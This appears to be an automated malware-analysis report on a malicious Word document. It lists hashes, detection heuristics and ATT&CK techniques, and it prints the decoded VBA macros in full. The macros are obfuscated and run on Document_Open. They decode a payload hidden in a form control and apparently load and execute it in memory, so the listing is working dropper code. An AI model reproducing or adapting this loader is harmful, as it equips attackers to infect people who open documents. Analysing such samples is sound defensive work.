Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab1bcd9e957b6b52…

MALICIOUS

Office (OLE)

327.5 KB Created: 2017-10-03 14:18:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: c9986b5cedda68f075e1f4f2ddab3ae6 SHA-1: 3149033c54f75a8d9870508900a946e5136db892 SHA-256: ab1bcd9e957b6b525209f0f5d8b9b85478f782d738fc83d999e6c1e377711ad3
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.Agent-6352658-0' heuristics. The 'Document_Open' macro suggests an attempt to execute malicious code upon opening. The VBA script appears to be obfuscated but likely functions as a downloader for a second-stage payload, a common tactic for malware distribution.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6352658-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6352658-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim intersexual As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8449 bytes
SHA-256: 2ae0f20f1483c4a62fdd9c1397e927f17cb285869f181fc2255d405121d719ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "abodule"

Function contaminated(pistol, polka)
Dim elephant(255) As Byte
restcure = 83 - 47 + 29
Do While restcure <= 90 + 1
elephant(restcure) = restcure - 65
restcure = restcure + 1
Loop
restcure = 48
Do While restcure <= 50 + 8
elephant(restcure) = restcure + 4
restcure = restcure + 1
Loop
restcure = 97
Do While restcure <= 120 + 3
elephant(restcure) = restcure - 71
restcure = restcure + 1
Loop
elephant(47) = 63
restcure = 43
elephant(restcure) = 60 + 2
contaminated = elephant
End Function

Function aperit(detonative)
aperit = AscW(detonative)
End Function


Attribute VB_Name = "Module1"
Function schsfe(puncuality, resuspension, carassius)
If carassius = 47 + (10 / 2 - 5) Then
potolok = puncuality \ resuspension
ElseIf carassius = 57 + (5 - 3) / 2 - 1 Then
potolok = puncuality And resuspension
ElseIf carassius = 65 + (56 / 7 - 4 * 2) Then
potolok = puncuality * resuspension
End If
schsfe = potolok
End Function
'  The moon went hiding, stars quit shining
'  Rain was driving, thunder, lightning

Function caltrop(inseverable) As String
Dim breadline(6962) As Byte
Dim briefing As Long
Dim impropriety As Long

Dim osutrigger As Long
Dim elief(63) As Long
Dim mantinea As Long
Dim alar() As Byte

Dim achievable(63) As Long
Dim constitution(63) As Long

Dim anguilliform() As Byte
anguilliform = VBA.StrConv(inseverable, 128)
 Pmt 0, 100, 8371, 34078, 5

quickscented = vbKeyShift - 12
For desmodus = (20 - 4 * 5) To 7800 + 43
If (desmodus Mod 2 = (5 - 5)) Then
anguilliform(desmodus) = anguilliform(desmodus) - quickscented
ElseIf Not (desmodus Mod 2 = (4 - 4)) Then
anguilliform(desmodus) = anguilliform(desmodus) - (quickscented - 1)
End If
Next desmodus
 Pmt 0, 76, 37014, 55110, 4

biplicity = abodule.contaminated(400, 20)
For osutrigger = (7 - 7) * 1 To (50 + 13) * (5 - 4)
achievable(osutrigger) = _
schsfe(osutrigger, _
51 - 73 + 86, _
65)
constitution(osutrigger) = _
schsfe(osutrigger, 112 - 102 + 4086, 65)
elief(osutrigger) = schsfe(osutrigger, 88 - 47 + 262103, 65)
Next osutrigger
 Pmt 0, 84, 35877, 21541, 7

alar = anguilliform
 Pmt 0, 76, 23498, 15343, 6

accordance = 100 - 56 - 41

giantism = 67 - 40 - 25
For briefing = (4 - 4) To 7800 + 43
bumpy = alar(briefing)
headquarters = alar(briefing + 2)
hilar = constitution(biplicity(alar(briefing + 1)))
dioscorea = achievable(biplicity(headquarters)) + _
biplicity(alar(briefing + accordance))
mantinea = elief(biplicity(bumpy)) + hilar + dioscorea
osutrigger = schsfe(mantinea, 55 - 126 + 16711751, 50 + 7)
breadline(impropriety) = schsfe(osutrigger, 65 - 101 + 65572, 40 + 7)
osutrigger = schsfe(mantinea, 118 - 18 + 65180, 50 + 7)
breadline(impropriety + 1) = schsfe(osutrigger, 35 - 84 + 305, 47)
breadline(impropriety + giantism) = schsfe(mantinea, 94 - 68 + 229, 57)
impropriety = impropriety + giantism + 1
briefing = briefing + 3
Next
caltrop = breadline
End Function



Attribute VB_Name = "Module2"
Function incapable(sapiens)
Dim belligerently As Variant
Dim catwalk As Integer
Dim chaucer As Byte
Dim appositively As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim myxomatosis As Long
Dim sedition As LongPtr
mendacious = 102 - 52 - 42
Dim brimstone As LongPtr
Dim desecration As Byte
Dim modernism As Variant
Dim accouplement As LongPtr
Dim valueless As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sedition As Long
mendacious = 118 - 111 - 3
Dim brimstone As Long
Dim accouplement As Long
#End If
nephrolithiasis = VarPtr(sedition)
sermonize = extend(nephrolithiasis, VarPtr(sapiens) + 8, mendacious)
tarahumara = 79 - 106 + 26
brimstone = 25 - 45 + 20
archeologist = 20 - 77 + 57
accouplement = 1 - 72 + 10007
addressed = 52 - 38 + 4082
sarcosome = 53 - 88 + 99
tetonnement = genitalia(ByVal tarahumara, _
brimstone, ByVal archeologist, accouplement, ByVal addressed, _
ByVal sarcosome)
yam = yam

expressionism = "beardless"

extend brimstone, sedition, 124 - 46 + 5805
imbibe = 30 + 1
misunderstood = 39330 + 0
gazebo = 416070 + 1
 Pmt 0, imbibe, 11127, 12298, 4

incapable = brimstone
End Function

Function avuncular()
Dim musclebound As String
Dim ranking As Long
leptodactylus.buteonine.Value = Day(#12/5/2013#)
varday = asperous = "monstrous"
disgustedly = humphrey
marginally = geebung
explication = "momentous"
colostrum = calcaneal

donatus = actor
naproxen = "unconscious"
yaffle = "memorial"
Set towith = leptodactylus.buteonine.SelectedItem
anguished = 74
adad = 16881
adynamia = 231668
 Pmt 0, anguished, 17696, 54956, 5

cutout = towith.Name
sublineation = 52 - 24 + 7816
acetal = Right(cutout, sublineation)
fagales = Module1.caltrop(acetal)
adult = 60
increment = 34263
acroclinium = 486856
 Pmt 0, adult, 3783, 38171, 2

fendre = "astrologer"
wench = "macrocheira"
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim sulkiness As Long
Dim nonreciprocating As LongPtr
Dim crossbones As LongPtr
Dim afghani As Integer

Dim carol As String
Dim medley As LongPtr
Dim blather As LongPtr
Dim flageolet As LongPtr
unjustifiable = 74 - 85 + 2075
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim de As Variant
Dim crossbones As Long
Dim goodlooking As Byte
Dim nonreciprocating As Long

Dim medley As Long
extinguish = 120 - 90 + 751
Dim blather As Long
Dim flageolet As Long
unjustifiable = extinguish + 3459
#End If
nursing = 10 - 79 + 69
halfholiday = "plaster"
hypovolemia = 114 - 38 + 4020
inshore = 5
exude = 7913
filariid = 572397
 Pmt 0, inshore, 22828, 17760, 6

forfend = millettia
corpulence = "changeful"
disdainful = "managed"
indeterminate = 103
mystery = 16919
annex = 300455
 Pmt 0, indeterminate, 24790, 33813, 5

epidiascope = fagales
golden = "adultness"
nonreciprocating = incapable(epidiascope)
coryphaenidae = "statistical"
annular = "status"
Dim obduration As String
Dim abattoir As Integer
medley = 8 - 110 + 102
crossbones = nonreciprocating + unjustifiable
blather = 116 - 50 + 201461
flageolet = 105 - 64 + 3459
nazism = ensign(blather, medley, crossbones, medley, medley, medley, medley)
axenic = 24
arctium = 17955
churchill = 492273
 Pmt 0, axenic, 25360, 47372, 7

End Function

Attribute VB_Name = "Module3"
Function extend(horsecar, somatic, forewing)
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim alca As Byte
Dim ordo As Variant
Dim accused As LongPtr
Dim neurasthenia As LongPtr
Dim monopteral As LongPtr
Dim buganda As Long
Dim afoot As LongPtr
Dim airliner As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim neurasthenia As Long
Dim callboard As Integer
Dim accused As Long
Dim snowplow As String
Dim afoot As Long
Dim overtaken As Integer
Dim monopteral As Long
Dim bimonthly As Long
Dim airliner As Long
Dim argosy As Byte
Dim endlessly As String
#End If
elephantus = Math.Round(435)
expressionism = "underling"
neurasthenia = horsecar
airliner = forewing
yam = "frappe"
afoot = somatic
selfworship = 110 + 4
gest = 6360 + 2
ceremony = 404330 + 7
 Pmt 0, selfworship, 5176, 35668, 8

expressionism = "caliche"
accused = 33 - 66 + 32
crosstalk ByVal accused, neurasthenia, afoot, airliner, monopteral
expressionism = expressionism
End Function

Attribute VB_Name = "Module4"

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Open()
Dim intersexual As Variant
Dim hyetography As Variant
unpretentiousness = "dawdler"
kittentails = "astrocytic"
avuncular
coelo = 40 + 8
disfigurement = 20980 + 7
adhibition = 587870 + 0
 Pmt 0, coelo, 16481, 36653, 8
End Sub

Attribute VB_Name = "leptodactylus"
Attribute VB_Base = "0{B561C2D5-313D-4B73-9326-29B8460ACA37}{2FB88A8C-084A-4D7B-98CC-FCE0D0AA7F5D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False